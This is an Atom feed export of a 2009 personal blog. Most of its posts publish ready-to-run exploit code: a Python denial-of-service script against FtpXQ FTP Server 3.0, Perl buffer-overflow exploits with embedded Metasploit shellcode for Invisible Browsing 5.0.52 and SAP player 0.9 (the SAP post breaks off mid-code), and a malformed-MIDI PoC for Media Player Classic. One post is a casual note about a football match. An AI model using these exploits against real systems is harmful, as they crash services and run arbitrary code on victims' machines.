<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-5335593286401958291</id><updated>2011-07-07T17:51:14.716-07:00</updated><title type='text'>Platen's blog</title><subtitle type='html'>inoffensive Devils</subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://hjafari.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5335593286401958291/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://hjafari.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>PLATEN</name><uri>http://www.blogger.com/profile/09070483891505018921</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>9</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-5335593286401958291.post-1841132096929581039</id><published>2009-09-15T03:12:00.000-07:00</published><updated>2009-09-16T01:52:08.535-07:00</updated><title type='text'>FtpXQ FTP Server 3.0 Remote Denial of Service Exploit</title><content type='html'>&lt;pre&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;&lt;/span&gt;&lt;/pre&gt;&lt;br /&gt;&lt;pre&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;#!/usr/bin/python&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;print "############################################################"&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;print "##                Iranian Pentesters Home                 ##"&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;print "##                   Www.Pentesters.Ir                    ##"&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;print "##                  PLATEN -[ H.jafari ]-                 ##"&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;print "## FtpXQ FTP Server 3.0 Remote Denial Of Service Exploit  ##"&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;print "## author: PLATEN                                         ##"&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;print "## E-mail &amp;amp;&amp;amp; blog:                                        ##"&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;print "## hjafari.blogspot.com                                   ##"&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;print "## platen.secure[at]gmail[dot]com                         ##"&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;print "## Greetings: Cru3l.b0y, b3hz4d, Cdef3nder                ##"&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;print "## and all members in Pentesters.ir                       ##"&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;print "############################################################"&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;import socket&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;import sys&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;def Usage():&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;    print ("Usage: ./expl.py &lt;host&gt; &lt;username&gt; &lt;password&gt;\n")&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;buffer= "./A" * 6300&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;def start(hostname, username, passwd):&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;    try:&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;        sock.connect((hostname, 21))&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;    except:&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;        print ("[-] Connection error!")&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;        sys.exit(1)&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;    r=sock.recv(1024)&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;    print "[+] " + r&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;    sock.send("user %s\r\n" %username)&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;    r=sock.recv(1024)&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;    sock.send("pass %s\r\n" %passwd)&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;    r=sock.recv(1024)&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;    print "[+] Send evil string"&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt; &lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;    sock.send("ABOR %s\r\n" %buffer)&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;    sock.close()&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;if len(sys.argv) &lt;&gt; 4:&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;    Usage()&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;    sys.exit(1)&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;else:&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;    hostname=sys.argv[1]&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;    username=sys.argv[2]&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;    passwd=sys.argv[3]&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;    start(hostname,username,passwd)&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;    sys.exit(0)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_yr6JJbPFj8M/Sq9pu02ZvEI/AAAAAAAAACg/JqpfkJYLbxg/s1600-h/3.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 240px;" src="http://2.bp.blogspot.com/_yr6JJbPFj8M/Sq9pu02ZvEI/AAAAAAAAACg/JqpfkJYLbxg/s320/3.jpg" alt="" id="BLOGGER_PHOTO_ID_5381636332912753730" border="0" /&gt;&lt;/a&gt;&lt;a href="http://www.milw0rm.com/exploits/9664"&gt;&lt;br /&gt;http://www.milw0rm.com/exploits/9664&lt;/a&gt;&lt;br /&gt;&lt;a href="http://packetstormsecurity.com/0909-exploits/ftpxq-dos.txt"&gt;http://packetstormsecurity.com/0909-exploits/ftpxq-dos.txt&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5335593286401958291-1841132096929581039?l=hjafari.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hjafari.blogspot.com/feeds/1841132096929581039/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hjafari.blogspot.com/2009/09/ftpxq-ftp-server-30-remote-denial-of.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5335593286401958291/posts/default/1841132096929581039'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5335593286401958291/posts/default/1841132096929581039'/><link rel='alternate' type='text/html' href='http://hjafari.blogspot.com/2009/09/ftpxq-ftp-server-30-remote-denial-of.html' title='FtpXQ FTP Server 3.0 Remote Denial of Service Exploit'/><author><name>PLATEN</name><uri>http://www.blogger.com/profile/09070483891505018921</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_yr6JJbPFj8M/Sq9pu02ZvEI/AAAAAAAAACg/JqpfkJYLbxg/s72-c/3.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5335593286401958291.post-4364598204612878576</id><published>2009-09-14T13:03:00.000-07:00</published><updated>2009-09-14T13:42:58.873-07:00</updated><title type='text'>Tabriz red</title><content type='html'>&lt;div style="text-align: right;"&gt;&lt;div style="text-align: center;"&gt;&lt;div style="text-align: left;"&gt;bi rabte vali dishab estadium bodim aqa yak hali dad trip fagat barselonay bod felasher haye riZ moje mekzikiu O o E O A hameye shahr germez shode bod&lt;br /&gt;en khabar gozariya goftan 80 hezar vali man migam bishatr az 100 hezar nafar bodan estadium akhe ena ke nadidan ...:d&lt;br /&gt;en aksaram ba gushi gereftam hot hot halesho bebarin :d&lt;br /&gt;jaye hamat0n khali :d :X&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_yr6JJbPFj8M/Sq6i0f6HHXI/AAAAAAAAACI/kT0uyke7fP4/s1600-h/26062007067.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 240px;" src="http://1.bp.blogspot.com/_yr6JJbPFj8M/Sq6i0f6HHXI/AAAAAAAAACI/kT0uyke7fP4/s320/26062007067.jpg" alt="" id="BLOGGER_PHOTO_ID_5381417627556453746" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_yr6JJbPFj8M/Sq6j1PB5GLI/AAAAAAAAACQ/5JxkEsyj2H8/s1600-h/26062007069.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 240px;" src="http://2.bp.blogspot.com/_yr6JJbPFj8M/Sq6j1PB5GLI/AAAAAAAAACQ/5JxkEsyj2H8/s320/26062007069.jpg" alt="" id="BLOGGER_PHOTO_ID_5381418739717183666" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5335593286401958291-4364598204612878576?l=hjafari.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hjafari.blogspot.com/feeds/4364598204612878576/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hjafari.blogspot.com/2009/09/tabriz-red.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5335593286401958291/posts/default/4364598204612878576'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5335593286401958291/posts/default/4364598204612878576'/><link rel='alternate' type='text/html' href='http://hjafari.blogspot.com/2009/09/tabriz-red.html' title='Tabriz red'/><author><name>PLATEN</name><uri>http://www.blogger.com/profile/09070483891505018921</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_yr6JJbPFj8M/Sq6i0f6HHXI/AAAAAAAAACI/kT0uyke7fP4/s72-c/26062007067.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5335593286401958291.post-5918913609015786750</id><published>2009-09-14T11:26:00.000-07:00</published><updated>2009-09-15T02:13:45.325-07:00</updated><title type='text'>Invisible Browsing 5.0.52 (.ibkey) Local Buffer Overflow Exploit</title><content type='html'>&lt;pre&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;#!/usr/bin/perl&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;print qq(&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;  ############################################################&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;  ##                Iranian Pentesters Home                 ##&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;  ##                   Www.Pentesters.Ir                    ##&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;  ##                  PLATEN -[ H.jafari ]-                 ## &lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;  ## Invisible Browsing 5.0.52 (.ibkey) Local BoF Exploit   ##&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;  ## bug found &amp;amp; exploited by:  PLATEN                      ##&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;  ## E-mail &amp;amp;&amp;amp; blog:                                        ##&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;  ## hjafari.blogspot.com                                   ##&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;  ## platen.secure[at]gmail[dot]com                         ## &lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;  ## Greetings: Cru3l.b0y, b3hz4d, Cdef3nder                ##&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;  ## and all members in Pentesters.ir                       ##&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;  ############################################################&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;);&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;# Note: I just test this version&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;$junk  ="\x41"x 5000;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;$ret   = "\x93\x43\x92\x7c";&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;$nop   = "\x90" x 50;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;# win32_exec - Size=160&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;#EXITFUNC=seh CMD=calc  &lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;#Encoder=PexFnstenvSub http://metasploit.com&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;$shellcode =&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;"\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x38".&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;"\x78\x73\x8a\x83\xeb\xfc\xe2\xf4\xc4\x90\x37\x8a\x38\x78\xf8\xcf".&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;"\x04\xf3\x0f\x8f\x40\x79\x9c\x01\x77\x60\xf8\xd5\x18\x79\x98\xc3".&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;"\xb3\x4c\xf8\x8b\xd6\x49\xb3\x13\x94\xfc\xb3\xfe\x3f\xb9\xb9\x87".&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;"\x39\xba\x98\x7e\x03\x2c\x57\x8e\x4d\x9d\xf8\xd5\x1c\x79\x98\xec".&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;"\xb3\x74\x38\x01\x67\x64\x72\x61\xb3\x64\xf8\x8b\xd3\xf1\x2f\xae".&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;"\x3c\xbb\x42\x4a\x5c\xf3\x33\xba\xbd\xb8\x0b\x86\xb3\x38\x7f\x01".&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;"\x48\x64\xde\x01\x50\x70\x98\x83\xb3\xf8\xc3\x8a\x38\x78\xf8\xe2".&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;"\x04\x27\x42\x7c\x58\x2e\xfa\x72\xbb\xb8\x08\xda\x50\x88\xf9\x8e".&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;"\x67\x10\xeb\x74\xb2\x76\x24\x75\xdf\x1b\x12\xe6\x5b\x78\x73\x8a";&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;open(fhandle,'&gt;&gt;expl.ibkey');&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;print fhandle $junk.$ret.$nop.$shellcode;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;close(fhandle);&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;print "\n  [+] File created successfully: expl.ibkey \n";&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;/pre&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_yr6JJbPFj8M/Sq6LlbqInGI/AAAAAAAAACA/XVV-zI9vKfk/s1600-h/ib-screen.JPG"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 190px;" src="http://2.bp.blogspot.com/_yr6JJbPFj8M/Sq6LlbqInGI/AAAAAAAAACA/XVV-zI9vKfk/s320/ib-screen.JPG" alt="" id="BLOGGER_PHOTO_ID_5381392079950224482" border="0" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;pre&gt;&lt;br /&gt;&lt;/pre&gt;&lt;div style="text-align: center;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_yr6JJbPFj8M/Sq6LKvJK52I/AAAAAAAAAB4/RP18gp0XH6g/s1600-h/ib-bof.JPG"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px; height: 256px;" src="http://1.bp.blogspot.com/_yr6JJbPFj8M/Sq6LKvJK52I/AAAAAAAAAB4/RP18gp0XH6g/s320/ib-bof.JPG" alt="" id="BLOGGER_PHOTO_ID_5381391621324203874" border="0" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: left;"&gt;&lt;pre&gt;&lt;a href="http://www.milw0rm.com/exploits/9655"&gt;&lt;br /&gt;http://www.milw0rm.com/exploits/9655&lt;/a&gt;&lt;br /&gt;&lt;a href="http://packetstormsecurity.com/0909-exploits/invisiblebrowsing-overflow.txt"&gt;http://packetstormsecurity.com/0909-exploits/invisiblebrowsing-overflow.txt&lt;/a&gt;&lt;br /&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div style="text-align: center;"&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5335593286401958291-5918913609015786750?l=hjafari.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hjafari.blogspot.com/feeds/5918913609015786750/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hjafari.blogspot.com/2009/09/invisible-browsing-5052-ibkey-local.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5335593286401958291/posts/default/5918913609015786750'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5335593286401958291/posts/default/5918913609015786750'/><link rel='alternate' type='text/html' href='http://hjafari.blogspot.com/2009/09/invisible-browsing-5052-ibkey-local.html' title='Invisible Browsing 5.0.52 (.ibkey) Local Buffer Overflow Exploit'/><author><name>PLATEN</name><uri>http://www.blogger.com/profile/09070483891505018921</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_yr6JJbPFj8M/Sq6LlbqInGI/AAAAAAAAACA/XVV-zI9vKfk/s72-c/ib-screen.JPG' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5335593286401958291.post-3214796822769783065</id><published>2009-09-09T22:24:00.000-07:00</published><updated>2009-09-10T13:05:15.545-07:00</updated><title type='text'>Media Player Classic 6.4.9(.mid) Integer Overflow PoC</title><content type='html'>&lt;span style="color: rgb(51, 204, 0);"&gt;#!/usr/bin/perl&lt;/span&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;&lt;span style="font-family:monospace;"&gt;&lt;br /&gt;&lt;/span&gt;print qq(&lt;/span&gt;&lt;br /&gt;&lt;pre&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;  ############################################################&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;  ##            Iranian Pentesters Home                     ##&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;  ##               Www.Pentesters.Ir                        ##&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;  ##              PLATEN -[ H.jafari ]-                     ## &lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;  ## Media Player Classic 6.4.9(.mid) Integer Overflow PoC  ##&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;  ## Vulnerability Discovered By : PLATEN                   ##&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;  ## E-mail &amp;amp;&amp;amp; blog:                                        ##&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;  ## hjafari.blogspot.com                                   ##&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;  ## platen.secure[at]gmail[dot]com                         ## &lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;  ## Greetings: Cru3l.b0y, b3hz4d, Cdef3nder                ##&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;  ## and all members in Pentesters.ir                       ##&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;  ############################################################&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;);&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;$boom = "\x4d\x54\x68\x64\x00\x00\x00\x06\x00\x01\x00\x01\x00\x60\x4d\x54".&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;"\x72\x6b\x00\x00\x00\x4e\x00\xff\x03\x08\x34\x31\x33\x61\x34\x61".&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;"\x35\x30\x00\x91\x41\x60\x01\x3a\x60\x01\x4a\x60\x01\x50\x60\x7d".&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;"\x81\x41\x01\x01\x3a\x5f\x8d\xe4\xa0\x01\x50\x01\x3d\x91\x41\x60".&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;"\x81\x00\x81\x41\x40\x00\x91\x3a\x60\x81\x00\x76\x6f\xcc\x3d\xa6".&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;"\xc2\x48\xee\x8e\xca\xc2\x57\x00\x91\x50\x60\x81\x00\x81\x50\x40".&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;"\x00\xff\x2f\x00";&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;open(fhandle,'&gt;&gt;expl.mid') || die "can't create file: expl.mid";&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;print fhandle $boom;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;close(fhandle);&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 204, 0);"&gt;print "\n  [+] File created successfully: expl.mid \n";&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;/pre&gt;&lt;div style="text-align: center;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://2.bp.blogspot.com/_yr6JJbPFj8M/SqiSxsCdUII/AAAAAAAAABw/lNebQs4OfmI/s1600-h/mpc-homecinema.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 188px; height: 200px;" src="http://2.bp.blogspot.com/_yr6JJbPFj8M/SqiSxsCdUII/AAAAAAAAABw/lNebQs4OfmI/s200/mpc-homecinema.jpg" alt="" id="BLOGGER_PHOTO_ID_5379711137226772610" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_yr6JJbPFj8M/SqiQGFEmBeI/AAAAAAAAABo/CepGg61wsu0/s1600-h/mplayer-c.JPG"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 200px; height: 123px;" src="http://1.bp.blogspot.com/_yr6JJbPFj8M/SqiQGFEmBeI/AAAAAAAAABo/CepGg61wsu0/s200/mplayer-c.JPG" alt="" id="BLOGGER_PHOTO_ID_5379708189009118690" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;/div&gt;&lt;pre&gt;&lt;br /&gt;&lt;a href="http://www.milw0rm.com/exploits/9620"&gt;http://www.milw0rm.com/exploits/9620&lt;/a&gt;&lt;br /&gt;&lt;a href="http://packetstormsecurity.com/0909-exploits/mpc649-overflow.txt"&gt;http://packetstormsecurity.com/0909-exploits/mpc649-overflow.txt&lt;/a&gt;&lt;br /&gt;&lt;/pre&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5335593286401958291-3214796822769783065?l=hjafari.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hjafari.blogspot.com/feeds/3214796822769783065/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hjafari.blogspot.com/2009/09/media-player-classic-649mid-integer.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5335593286401958291/posts/default/3214796822769783065'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5335593286401958291/posts/default/3214796822769783065'/><link rel='alternate' type='text/html' href='http://hjafari.blogspot.com/2009/09/media-player-classic-649mid-integer.html' title='Media Player Classic 6.4.9(.mid) Integer Overflow PoC'/><author><name>PLATEN</name><uri>http://www.blogger.com/profile/09070483891505018921</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/_yr6JJbPFj8M/SqiSxsCdUII/AAAAAAAAABw/lNebQs4OfmI/s72-c/mpc-homecinema.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5335593286401958291.post-834300111143714934</id><published>2009-09-03T13:27:00.000-07:00</published><updated>2009-09-08T10:26:01.328-07:00</updated><title type='text'>SAP player 0.9 (.m3u) Universal Local BoF Exploit(SEH)</title><content type='html'>&lt;pre style="color: rgb(51, 255, 51);"&gt;#!/usr/bin/perl&lt;br /&gt;&lt;br /&gt;$junk="\x41"x 35496;&lt;br /&gt;$nseh = "\xEB\x06\x90\x90"; #short jump over SEH handler&lt;br /&gt;$seh="\x27\x4a\x01\x10"; #universal p/p/r&lt;br /&gt;$nop="\x90"x 100;&lt;br /&gt;# win32_exec - Size=160&lt;br /&gt;#EXITFUNC=seh CMD=calc&lt;br /&gt;#Encoder=PexFnstenvSub http://metasploit.com&lt;br /&gt;$shellcode =&lt;br 